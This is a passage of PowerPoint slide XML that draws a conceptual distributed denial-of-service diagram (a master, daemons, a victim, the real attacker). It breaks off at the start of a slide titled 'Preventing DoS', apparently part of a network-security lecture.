                <a:gd name="T77" fmla="*/ 69 h 1642"/>
                <a:gd name="T78" fmla="*/ 730 w 2235"/>
                <a:gd name="T79" fmla="*/ 155 h 1642"/>
                <a:gd name="T80" fmla="*/ 696 w 2235"/>
                <a:gd name="T81" fmla="*/ 284 h 1642"/>
                <a:gd name="T82" fmla="*/ 447 w 2235"/>
                <a:gd name="T83" fmla="*/ 318 h 1642"/>
                <a:gd name="T84" fmla="*/ 275 w 2235"/>
                <a:gd name="T85" fmla="*/ 327 h 1642"/>
                <a:gd name="T86" fmla="*/ 137 w 2235"/>
                <a:gd name="T87" fmla="*/ 361 h 1642"/>
                <a:gd name="T88" fmla="*/ 111 w 2235"/>
                <a:gd name="T89" fmla="*/ 430 h 1642"/>
                <a:gd name="T90" fmla="*/ 180 w 2235"/>
                <a:gd name="T91" fmla="*/ 447 h 1642"/>
                <a:gd name="T92" fmla="*/ 275 w 2235"/>
                <a:gd name="T93" fmla="*/ 473 h 1642"/>
                <a:gd name="T94" fmla="*/ 309 w 2235"/>
                <a:gd name="T95" fmla="*/ 525 h 1642"/>
                <a:gd name="T96" fmla="*/ 292 w 2235"/>
                <a:gd name="T97" fmla="*/ 576 h 1642"/>
                <a:gd name="T98" fmla="*/ 292 w 2235"/>
                <a:gd name="T99" fmla="*/ 585 h 1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5" h="1642">
                  <a:moveTo>
                    <a:pt x="292" y="585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="588"/>
                    <a:pt x="211" y="585"/>
                    <a:pt x="172" y="594"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="600"/>
                    <a:pt x="103" y="628"/>
                    <a:pt x="103" y="628"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="703"/>
                    <a:pt x="20" y="782"/>
                    <a:pt x="0" y="869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="975"/>
                    <a:pt x="1" y="1003"/>
                    <a:pt x="43" y="1084"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1122"/>
                    <a:pt x="71" y="1143"/>
                    <a:pt x="86" y="1178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="1186"/>
                    <a:pt x="88" y="1197"/>
                    <a:pt x="94" y="1204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="1253"/>
                    <a:pt x="171" y="1220"/>
                    <a:pt x="215" y="1299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267" y="1393"/>
                    <a:pt x="303" y="1430"/>
                    <a:pt x="404" y="1470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="1490"/>
                    <a:pt x="449" y="1517"/>
                    <a:pt x="472" y="1531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="1536"/>
                    <a:pt x="490" y="1536"/>
                    <a:pt x="498" y="1539"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="1544"/>
                    <a:pt x="522" y="1549"/>
                    <a:pt x="533" y="1556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="1585"/>
                    <a:pt x="598" y="1629"/>
                    <a:pt x="653" y="1642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="916" y="1638"/>
                    <a:pt x="1154" y="1632"/>
                    <a:pt x="1410" y="1617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1450" y="1605"/>
                    <a:pt x="1490" y="1593"/>
                    <a:pt x="1530" y="1582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1575" y="1570"/>
                    <a:pt x="1627" y="1572"/>
                    <a:pt x="1667" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1725" y="1513"/>
                    <a:pt x="1758" y="1447"/>
                    <a:pt x="1814" y="1410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1837" y="1374"/>
                    <a:pt x="1853" y="1340"/>
                    <a:pt x="1882" y="1307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1895" y="1292"/>
                    <a:pt x="1914" y="1281"/>
                    <a:pt x="1925" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="1178"/>
                    <a:pt x="2009" y="1079"/>
                    <a:pt x="2054" y="989"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="951"/>
                    <a:pt x="2111" y="939"/>
                    <a:pt x="2132" y="903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2147" y="878"/>
                    <a:pt x="2161" y="852"/>
                    <a:pt x="2175" y="826"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2181" y="815"/>
                    <a:pt x="2192" y="791"/>
                    <a:pt x="2192" y="791"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2204" y="730"/>
                    <a:pt x="2216" y="699"/>
                    <a:pt x="2235" y="645"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2232" y="614"/>
                    <a:pt x="2232" y="582"/>
                    <a:pt x="2226" y="551"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2200" y="424"/>
                    <a:pt x="1975" y="459"/>
                    <a:pt x="1908" y="456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1891" y="450"/>
                    <a:pt x="1869" y="445"/>
                    <a:pt x="1857" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1821" y="385"/>
                    <a:pt x="1848" y="311"/>
                    <a:pt x="1805" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1774" y="235"/>
                    <a:pt x="1770" y="241"/>
                    <a:pt x="1728" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1668" y="203"/>
                    <a:pt x="1611" y="196"/>
                    <a:pt x="1547" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1522" y="175"/>
                    <a:pt x="1429" y="148"/>
                    <a:pt x="1427" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1415" y="141"/>
                    <a:pt x="1405" y="132"/>
                    <a:pt x="1392" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1333" y="114"/>
                    <a:pt x="1264" y="110"/>
                    <a:pt x="1203" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1153" y="87"/>
                    <a:pt x="1140" y="40"/>
                    <a:pt x="1091" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075" y="11"/>
                    <a:pt x="1040" y="0"/>
                    <a:pt x="1040" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="3"/>
                    <a:pt x="965" y="2"/>
                    <a:pt x="928" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="901" y="14"/>
                    <a:pt x="851" y="35"/>
                    <a:pt x="851" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="44"/>
                    <a:pt x="829" y="54"/>
                    <a:pt x="816" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="808" y="65"/>
                    <a:pt x="798" y="64"/>
                    <a:pt x="791" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="762" y="89"/>
                    <a:pt x="746" y="125"/>
                    <a:pt x="730" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="726" y="189"/>
                    <a:pt x="724" y="256"/>
                    <a:pt x="696" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="636" y="344"/>
                    <a:pt x="498" y="316"/>
                    <a:pt x="447" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="321"/>
                    <a:pt x="332" y="324"/>
                    <a:pt x="275" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="334"/>
                    <a:pt x="186" y="346"/>
                    <a:pt x="137" y="361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="374"/>
                    <a:pt x="83" y="402"/>
                    <a:pt x="111" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="438"/>
                    <a:pt x="179" y="447"/>
                    <a:pt x="180" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="454"/>
                    <a:pt x="243" y="466"/>
                    <a:pt x="275" y="473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="485"/>
                    <a:pt x="311" y="503"/>
                    <a:pt x="309" y="525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="543"/>
                    <a:pt x="292" y="576"/>
                    <a:pt x="292" y="576"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="588"/>
                    <a:pt x="327" y="585"/>
                    <a:pt x="292" y="585"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF66"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0000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 name="Rectangle 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3657600" y="5029200"/>
              <a:ext cx="1371600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="996633"/>
            </a:solidFill>
            <a:ln w="9525">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rPr>
                <a:t>Victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Oval 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6248400" y="3581400"/>
              <a:ext cx="1295400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0000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rPr>
                <a:t>Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5029200" y="1600200"/>
              <a:ext cx="1295400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0000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rPr>
                <a:t>Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6553200" y="2590800"/>
              <a:ext cx="1219200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0000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Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1447800" y="2895600"/>
              <a:ext cx="1295400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0000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rPr>
                <a:t>Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1524000" y="4343400"/>
              <a:ext cx="1295400" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0000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rPr>
                <a:t>Daemon</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4267200" y="4343400"/>
              <a:ext cx="0" cy="68580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5" name="Freeform 18"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2514600" y="3771900"/>
              <a:ext cx="1828800" cy="1181100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1152"/>
                <a:gd name="T1" fmla="*/ 408 h 744"/>
                <a:gd name="T2" fmla="*/ 624 w 1152"/>
                <a:gd name="T3" fmla="*/ 24 h 744"/>
                <a:gd name="T4" fmla="*/ 1056 w 1152"/>
                <a:gd name="T5" fmla="*/ 264 h 744"/>
                <a:gd name="T6" fmla="*/ 1152 w 1152"/>
                <a:gd name="T7" fmla="*/ 744 h 744"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1152" h="744">
                  <a:moveTo>
                    <a:pt x="0" y="408"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="228"/>
                    <a:pt x="448" y="48"/>
                    <a:pt x="624" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="800" y="0"/>
                    <a:pt x="968" y="144"/>
                    <a:pt x="1056" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1144" y="384"/>
                    <a:pt x="1148" y="564"/>
                    <a:pt x="1152" y="744"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000099"/>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6" name="Freeform 19"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2743200" y="3048000"/>
              <a:ext cx="1536700" cy="1981200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 968"/>
                <a:gd name="T1" fmla="*/ 48 h 1248"/>
                <a:gd name="T2" fmla="*/ 624 w 968"/>
                <a:gd name="T3" fmla="*/ 96 h 1248"/>
                <a:gd name="T4" fmla="*/ 912 w 968"/>
                <a:gd name="T5" fmla="*/ 624 h 1248"/>
                <a:gd name="T6" fmla="*/ 960 w 968"/>
                <a:gd name="T7" fmla="*/ 1152 h 1248"/>
                <a:gd name="T8" fmla="*/ 960 w 968"/>
                <a:gd name="T9" fmla="*/ 1200 h 1248"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="968" h="1248">
                  <a:moveTo>
                    <a:pt x="0" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="24"/>
                    <a:pt x="472" y="0"/>
                    <a:pt x="624" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="776" y="192"/>
                    <a:pt x="856" y="448"/>
                    <a:pt x="912" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="968" y="800"/>
                    <a:pt x="952" y="1056"/>
                    <a:pt x="960" y="1152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="968" y="1248"/>
                    <a:pt x="964" y="1224"/>
                    <a:pt x="960" y="1200"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000099"/>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7" name="Freeform 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4114800" y="1981200"/>
              <a:ext cx="1066800" cy="2971800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 672 w 672"/>
                <a:gd name="T1" fmla="*/ 0 h 1872"/>
                <a:gd name="T2" fmla="*/ 336 w 672"/>
                <a:gd name="T3" fmla="*/ 432 h 1872"/>
                <a:gd name="T4" fmla="*/ 48 w 672"/>
                <a:gd name="T5" fmla="*/ 1344 h 1872"/>
                <a:gd name="T6" fmla="*/ 48 w 672"/>
                <a:gd name="T7" fmla="*/ 1872 h 1872"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="672" h="1872">
                  <a:moveTo>
                    <a:pt x="672" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="104"/>
                    <a:pt x="440" y="208"/>
                    <a:pt x="336" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="656"/>
                    <a:pt x="96" y="1104"/>
                    <a:pt x="48" y="1344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1584"/>
                    <a:pt x="48" y="1784"/>
                    <a:pt x="48" y="1872"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000099"/>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8" name="Freeform 21"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2590800"/>
              <a:ext cx="2362200" cy="2286000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1488 w 1488"/>
                <a:gd name="T1" fmla="*/ 104 h 1400"/>
                <a:gd name="T2" fmla="*/ 624 w 1488"/>
                <a:gd name="T3" fmla="*/ 152 h 1400"/>
                <a:gd name="T4" fmla="*/ 96 w 1488"/>
                <a:gd name="T5" fmla="*/ 1016 h 1400"/>
                <a:gd name="T6" fmla="*/ 48 w 1488"/>
                <a:gd name="T7" fmla="*/ 1400 h 1400"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1488" h="1400">
                  <a:moveTo>
                    <a:pt x="1488" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1172" y="52"/>
                    <a:pt x="856" y="0"/>
                    <a:pt x="624" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="304"/>
                    <a:pt x="192" y="808"/>
                    <a:pt x="96" y="1016"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1224"/>
                    <a:pt x="56" y="1336"/>
                    <a:pt x="48" y="1400"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000099"/>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9" name="Freeform 22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="3517900"/>
              <a:ext cx="1905000" cy="1358900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1200 w 1200"/>
                <a:gd name="T1" fmla="*/ 136 h 856"/>
                <a:gd name="T2" fmla="*/ 576 w 1200"/>
                <a:gd name="T3" fmla="*/ 40 h 856"/>
                <a:gd name="T4" fmla="*/ 192 w 1200"/>
                <a:gd name="T5" fmla="*/ 376 h 856"/>
                <a:gd name="T6" fmla="*/ 0 w 1200"/>
                <a:gd name="T7" fmla="*/ 856 h 856"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1200" h="856">
                  <a:moveTo>
                    <a:pt x="1200" y="136"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="972" y="68"/>
                    <a:pt x="744" y="0"/>
                    <a:pt x="576" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="408" y="80"/>
                    <a:pt x="288" y="240"/>
                    <a:pt x="192" y="376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="512"/>
                    <a:pt x="48" y="684"/>
                    <a:pt x="0" y="856"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000099"/>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20" name="Oval 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2133600" y="1752600"/>
              <a:ext cx="1143000" cy="5334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rPr>
                <a:t>Master</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2362200" y="2286000"/>
              <a:ext cx="228600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="952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22" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3276600" y="1828800"/>
              <a:ext cx="1752600" cy="152400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="952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23" name="Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3276600" y="2133600"/>
              <a:ext cx="3429000" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="952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24" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3124200" y="2209800"/>
              <a:ext cx="3581400" cy="1371600"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="952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25" name="Line 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2438400" y="2286000"/>
              <a:ext cx="609600" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="952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26" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="4800600"/>
              <a:ext cx="1905000" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000099"/>
            </a:solidFill>
            <a:ln w="9525">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0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>Real Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3124200" y="2286000"/>
              <a:ext cx="3581400" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607365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Preventing DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
